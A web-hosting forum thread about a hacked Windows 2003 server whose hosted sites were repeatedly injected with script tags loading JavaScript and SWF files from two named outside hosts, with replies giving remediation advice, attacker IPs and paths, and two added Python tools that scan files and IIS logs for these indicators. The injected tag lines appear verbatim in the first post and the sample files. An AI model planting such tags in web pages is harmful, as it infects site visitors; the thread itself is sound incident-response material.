  1. #1

    Web Server has been attacked, Help!

    Server info:
    Windows 2003 box
    Dedicated server currently hosted at the planet.

    Problem:

    It would appear there has been a security breach into the server recently. This morning we cleared off a Trojan, and also a new user that had been created on the server.

    All of our websites we host (around 200) had been affected. Almost every file had new javascript or links to an .swf, they load in iframes and are very malicious, actually giving any visitor to the site a virus.

    I tracked down the embed code that I found in most files appended to the end of each file.

    Below shows up in most .asp, .cfm, .html files (no spaces, just can't paste a url in here yet)...

    <scRipT s rc=http ://ww w .jeet.co.kr/flash/help.js></sCrIpt>
    <scRipT sr c=h ttp:// chanm.3322. org/flash/flash.swf></sCrIpt>

    Below shows up in any .js file (no spaces, just can't paste a url in here yet)...

    document.writeln ("<script sr c=\"ht tp:// ww w.jeet.co.kr/flash/help.js\"><\/script>");
    document.writeln ("<script sr c=\"htt p:// chanm.3322.or g/flash/flash.swf\"><\/script>");



    So I got a script that opens up every file looking for this code and stripping it out. Seemed to work at first, but now all the sites have been rewritten again..... and again. So obviously something is overwriting this.


    Any help or idea how to stop this? I'm pulling my hair out
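Added example (Python), not the original poster's clean-up script: a scanner that walks the web root looking for the injected tags quoted above. It matches both the mixed-case `<scRipT src=...>` form found in the .asp/.cfm/.html files and the `document.writeln("<script src=\"...\">")` form found in the .js files, keyed on the two hosts named in the post. Rather than stripping the tags in place, it records each hit with the file's modification time and hash, which is what you need to time the re-infection cycle against the server logs and find what is rewriting the files. The sample web root it builds is constructed for the demo.

```python
"""Scan a web root for the injected <script src=...> tags quoted in the thread.

Added example, not the original poster's script. Instead of stripping the tags
it records each hit (path, mtime, hash) so re-infection can be timed against
the server logs. KNOWN_BAD_HOSTS come from the post; the sample files are
constructed for illustration.
"""
import hashlib
import os
import re
import tempfile
from datetime import datetime, timezone

# Hosts quoted in the original post, treated as indicators of compromise.
KNOWN_BAD_HOSTS = ("jeet.co.kr", "chanm.3322.org")

# Case-insensitive because the injected tags use mixed case (scRipT / sCrIpt),
# which defeats a case-sensitive grep. The optional backslash before the quote
# lets the same pattern match the document.writeln("<script src=\"...\">")
# form that the post found in .js files.
SCRIPT_SRC_RE = re.compile(
    r"<script\b[^>]*?\bsrc\s*=\s*\\?[\"']?\s*(https?://[^\s\"'>\\]+)",
    re.IGNORECASE,
)

# File types the poster saw modified.
EXTENSIONS = {".asp", ".cfm", ".html", ".htm", ".js"}


def host_of(url):
    """Lower-cased host part of an http(s) URL, without scheme, path or port."""
    rest = re.sub(r"^https?://", "", url, flags=re.IGNORECASE)
    return rest.split("/")[0].split(":")[0].lower()


def find_injections(text):
    """Return the remote script URLs in `text` that point at a known-bad host."""
    hits = []
    for m in SCRIPT_SRC_RE.finditer(text):
        url = m.group(1)
        host = host_of(url)
        if any(host == bad or host.endswith("." + bad) for bad in KNOWN_BAD_HOSTS):
            hits.append(url)
    return hits


def scan_tree(root):
    """Walk `root`; return one record per infected file, sorted by path."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if os.path.splitext(name)[1].lower() not in EXTENSIONS:
                continue
            path = os.path.join(dirpath, name)
            with open(path, "rb") as fh:
                raw = fh.read()
            # latin-1 decodes every byte, so an odd encoding cannot abort the scan.
            urls = find_injections(raw.decode("latin-1"))
            if urls:
                mtime = os.stat(path).st_mtime
                findings.append({
                    "path": path,
                    "mtime": datetime.fromtimestamp(mtime, timezone.utc).isoformat(),
                    "urls": urls,
                    "sha256": hashlib.sha256(raw).hexdigest(),
                })
    return sorted(findings, key=lambda f: f["path"])


def build_sample_webroot():
    """Create a constructed web root: two infected files, one clean, one ignored."""
    root = tempfile.mkdtemp(prefix="webroot-")
    samples = {
        "index.asp": "<html><body>Hello</body></html>\n"
                     "<scRipT src=http://www.jeet.co.kr/flash/help.js></sCrIpt>\n",
        "menu.js": "var x = 1;\n"
                   'document.writeln ("<script src=\\"http://chanm.3322.org/flash/flash.swf\\"><\\/script>");\n',
        "about.html": '<script src="/js/site.js"></script>\n',
        "notes.txt": "http://www.jeet.co.kr/flash/help.js\n",  # wrong extension, skipped
    }
    for name, body in samples.items():
        with open(os.path.join(root, name), "w", encoding="latin-1") as fh:
            fh.write(body)
    return root


if __name__ == "__main__":
    for f in scan_tree(build_sample_webroot()):
        print(f["mtime"], f["sha256"][:12], f["path"], f["urls"])
```

Run it on a schedule against the real document root and diff successive reports: the `mtime` of each newly re-infected file is the timestamp to look up in the IIS and FTP logs, and a file whose hash changes without a corresponding deploy is being written by something other than your own publishing process.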

  2. #2
    We do not use Windows, but here is my advice.

    1) Move all log files off site, then go audit them.
    2) Install all updates/patches.
    3) Update av software, and scan.
    4) Check your firewall, block any suspicious IP addresses.
    5) Require a password change on all accounts.
    6) Then worry about fixing user files.

    Keith

  3. #3
    This calls for a complete clean reinstall after backing up your sites.

    The reinstall must take place using kvm/ip while off network.

    *Before* putting it back on the network, properly configure the firewall and all other security settings including those applying to IIS. Apply all required patches and service packs.

    You can then restore the sites one at a time, *after* ensuring that each is completely clean *and* does not offer a way in that you do not know about. In other words, they have to be completely audited.

    *Before* doing any of the above, figure out how you got hosed. Because you will need to prevent it in the new configuration. There is no point in proceeding before this is known.

    After all of that, do not *ever* be tempted to use a browser while in a terminal services session.

  4. #4
    It is not necessarily a problem with the web server security as there are lots of other reasons why pages get infected. A few possible reasons are:

    1. Vulnerable Scripts
    2. Insecure Programming
    3. Old versions of web applications
    4. Hacked FTP passwords

    There are many more reasons. Also, the majority of applications are found to be vulnerable to SQL Injection. Hence, reviewing the scripts is as important as checking the server security. It should also be made sure that no FTP password is stored in FTP clients.

    A Web Application Firewall (WAF) comes in handy in this case as it blocks a lot of web attacks. My choice is DotDefender.
    Prashant T.


  5. #5
    We have recently come across this same issue and have been dealing with it for the last 3 days. Note that this attack is believed to have happened due to a security exploit with FCKEditor utilizing an upload and creation of a .jpg file and the files image.cfm and index.cfm within the directories images/accounts.

    Many but not all of any javascript, html and application.cfm files utilized with the websites on the server had code injected into them which we took the steps to remove on more than one occasion as they continued to replicate.

    With some research it is known that it is an attack from a list of IPs from China. I assume a possible attempt to steal login info and possibly worse depending what would be stored on the infected server.

    This attack has been done through the FCKEditor utilized on 2 of the sites that are hosted on our server. It was noticed that the overall replications were occurring most in only one of the website folders but did start to spread over some time.

    Some steps we had to take (from our findings and searching google). . .

    If you use IIS, check to see that your sites have logging enabled. This can be switched off via the image.cfm file injected to the machine.

    There are a few .asp files that are with FCKEditor that are "bad" files and need to be removed. At this very moment I cannot recall what they were, but I recommend looking into when they were last updated, as many of these files should not have been modified or even used recently. Also keep looking at modify dates for sample folders or folders that are not for regular use. For the most part these can be removed, but we still need to test that FCK still functions properly after all of what we removed. For ColdFusion specifics, look for 3 files in reference to uploads.cfm and similar and MAKE SURE THEY ARE SECURED WITH SOME FORM OF SECURITY! We believe that this was where the actual attack first occurred, as we seemed to lack the full security of these admin level files.

    From what has happened I think this all became possible from this .jpg being uploaded with an image.cfm file that holds code for doing quite a bit of chaos, from uploading all sorts of things, removing content, creating its own paths and removing logs of its occurrences.

    Below is a list of paths and IPs discovered from our logs. . .

    222.245.219.25
    222.245.219.131
    222.245.211.158
    222.245.216.114
    222.245.214.74

    /images/accounts/ (image.cfm, index.cfm, "Chinese Characters".jpg)

    /includes/mxAjax/index.cfm t=1030 80 ***NOTE that the t variable content changed with each log and also was sometimes a form of write option for posting content.

    /errors/dumps/application.cfm

    Some of the paths above were not found in our system, so when the IPs called to them they were thrown a 404. Can't say the same would happen for everyone though.

    As of a few hours ago, we are clean. I will know for sure in the morning. My info may have been lacking as it is late and I am tired from dealing with this for half of today. Drop a line if you have questions.

    Best of luck!
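Added example (Python), not from anyone in the thread: a small triage pass over IIS 6 W3C-format logs that applies the indicators listed in this post (the five source IPs and the three paths) and the log-audit step Keith recommends in post #2. The `SUSPECT_IPS` and `SUSPECT_PATHS` values are the ones quoted above; the log lines are constructed for the demo; and the "server-side script under an upload directory" rule is my generalisation of the image.cfm-under-/images/accounts/ finding, not something the post states.

```python
"""Triage IIS 6 W3C-format logs for the indicators listed in post #5.

Added example, not from anyone in the thread. SUSPECT_IPS and SUSPECT_PATHS
are the values quoted in the post; the log lines are constructed, and the
"script under an upload directory" rule generalises the post's image.cfm finding.
"""
import re

SUSPECT_IPS = {
    "222.245.219.25", "222.245.219.131", "222.245.211.158",
    "222.245.216.114", "222.245.214.74",
}
# Compared lower-cased against cs-uri-stem.
SUSPECT_PATHS = (
    "/images/accounts/",
    "/includes/mxajax/index.cfm",
    "/errors/dumps/application.cfm",
)
# A server-side script sitting where only uploaded images belong is the shape
# of the image.cfm drop described in the post; flag it regardless of source IP.
SCRIPT_IN_UPLOAD_DIR = re.compile(
    r"/(images|upload|uploads|userfiles)/.*\.(cfm|asp|aspx|php)$", re.IGNORECASE
)

# Constructed sample in IIS 6 W3C extended format (default field set).
SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 6.0
#Version: 1.0
#Date: 2009-06-20 00:00:00
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status sc-substatus sc-win32-status
2009-06-20 00:00:01 10.0.0.5 GET /index.cfm - 80 - 203.0.113.7 Mozilla/4.0 200 0 0
2009-06-20 00:00:09 10.0.0.5 GET /images/accounts/image.cfm - 80 - 222.245.219.25 Mozilla/4.0 200 0 0
2009-06-20 00:00:12 10.0.0.5 POST /includes/mxAjax/index.cfm t=1030 80 - 222.245.211.158 Mozilla/4.0 404 0 2
2009-06-20 00:00:20 10.0.0.5 GET /errors/dumps/application.cfm - 80 - 198.51.100.9 Mozilla/4.0 404 0 2
2009-06-20 00:00:31 10.0.0.5 GET /images/logo.gif - 80 - 203.0.113.7 Mozilla/4.0 200 0 0
""".splitlines()


def parse_iis_log(lines):
    """Yield one dict per request, keyed by the most recent #Fields: header."""
    fields = None
    for line in lines:
        line = line.rstrip("\r\n")
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if not line or line.startswith("#") or fields is None:
            continue
        values = line.split(" ")
        if len(values) != len(fields):
            continue  # truncated or mangled line: skip rather than misalign columns
        yield dict(zip(fields, values))


def triage(records):
    """Return [{'record': ..., 'reasons': [...]}] for every request matching an indicator."""
    flagged = []
    for rec in records:
        stem = rec.get("cs-uri-stem", "").lower()
        reasons = []
        if rec.get("c-ip") in SUSPECT_IPS:
            reasons.append("source IP on the post's list")
        if any(stem.startswith(p) for p in SUSPECT_PATHS):
            reasons.append("path named in the post")
        if SCRIPT_IN_UPLOAD_DIR.search(stem):
            reasons.append("server-side script under an upload directory")
        if reasons:
            flagged.append({"record": rec, "reasons": reasons})
    return flagged


def candidate_block_list(flagged):
    """Sorted source IPs from the flagged requests, for review before any firewall change."""
    return sorted({f["record"]["c-ip"] for f in flagged})


if __name__ == "__main__":
    hits = triage(parse_iis_log(SAMPLE_LOG))
    for h in hits:
        r = h["record"]
        print(r["date"], r["time"], r["c-ip"], r["cs-method"], r["cs-uri-stem"],
              r["sc-status"], "|", "; ".join(h["reasons"]))
    print("candidate IPs:", candidate_block_list(hits))
```

Two points from the post carry over into the design: the parser reads the `#Fields:` header rather than assuming column positions, because IIS logs the fields the administrator enabled and the post notes that logging itself had been switched off on some sites; and a 404 on a suspect path is still reported, since the post observed probes for paths that did not exist on that server. Copy the logs off the box before running anything like this, as Keith suggests, so that the copy you audit cannot be altered by whatever is still writing to the server.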


  8. #8

    just to help

    hi,
    please contact servosupport.com as you can rely on them.
    we were happy with their service.
    Quote Originally Posted by surf1punk
